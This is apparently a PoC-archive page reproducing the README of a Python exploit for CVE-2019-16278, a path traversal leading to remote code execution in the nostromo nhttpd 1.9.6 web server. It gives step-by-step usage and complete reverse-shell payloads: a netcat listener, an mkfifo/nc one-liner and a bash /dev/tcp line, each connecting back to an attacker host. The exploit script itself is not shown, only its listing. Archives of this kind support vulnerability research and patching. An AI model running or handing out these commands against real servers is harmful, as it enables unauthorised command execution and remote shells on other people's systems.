Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-16278 PoC — nostromo nhttpd 路径遍历漏洞

Source
https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution
Associated Vulnerability
Title:nostromo nhttpd 路径遍历漏洞 (CVE-2019-16278)
Description:nostromo nhttpd是一款开源的Web服务器。 nostromo nhttpd 1.9.6及之前版本中的‘http_verify’函数存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。
Description
An unauthenticated attacker can force server points to a shell file like ‘/bin/sh’ and execute arbitrary commands due to the failure in verifying the URL which leads to path traversal to any file that exists in the system. Nostromo’s versions such as 1.9.6 fail to verify this URL
Readme


**Repository:** [https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git](https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git)  

## 📜 Description  
This repository contains a Python exploit for **CVE-2019-16278**, a vulnerability in **Nostromo 1.9.6** (a web server). The vulnerability allows for **Remote Code Execution (RCE)** by exploiting directory traversal to execute arbitrary commands on the target system.

## 🚀 Features  
- Execute custom shell commands on the vulnerable target.  
- Support for reverse shell payloads.  
- Ability to customize the size of the response from the target.  

---

## 🛠️ Requirements  
- **Python 3.x**  
- A machine running **Nostromo 1.9.6** (the vulnerable target).  
- **Netcat (nc)** to catch reverse shells.  

---

## ⚙️ Usage  

### Step 1: Clone the Repository  
```bash
git clone https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
cd CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution

Step 2: Run the Exploit

python3 CVE-2019-16278.py -t <TARGET_IP> -p <PORT> -c "<COMMAND>" [-b <BYTES_TO_READ>]

Arguments:
Argument	Description	Required	Default
-t, --target	The target IP address	Yes	None
-p, --port	The target port	Yes	None
-c, --command	The command to execute on the server	Yes	None
-b, --bytes	Number of bytes to read in response	No	4096
🧑‍💻 Examples
Example 1: Run whoami on the Target

python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "whoami"

Example 2: Reverse Shell with Netcat

Step 1: Start a Netcat listener on your attacking machine:

nc -lvnp 443

Step 2: Execute the exploit with a reverse shell payload:

python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.16.5 443 > /tmp/f"

Example 3: Reverse Shell using /dev/tcp

python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "bash -i >& /dev/tcp/10.10.16.5/443 0>&1"

🔍 Vulnerability Details

    CVE: CVE-2019-16278
    Affected Software: Nostromo 1.9.6 Web Server
    Type: Directory Traversal -> Remote Code Execution

⚠️ Disclaimer

This tool is intended for educational purposes only. Do not use it on systems you do not own or have explicit permission to test. Unauthorized access to systems is illegal. Use responsibly.
File Snapshot

 [4.0K]  /data/pocs/62dc2c0dd44576a01aa57231819c48d232484a6a
├── [1.2K]  exploit.py
└── [2.3K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.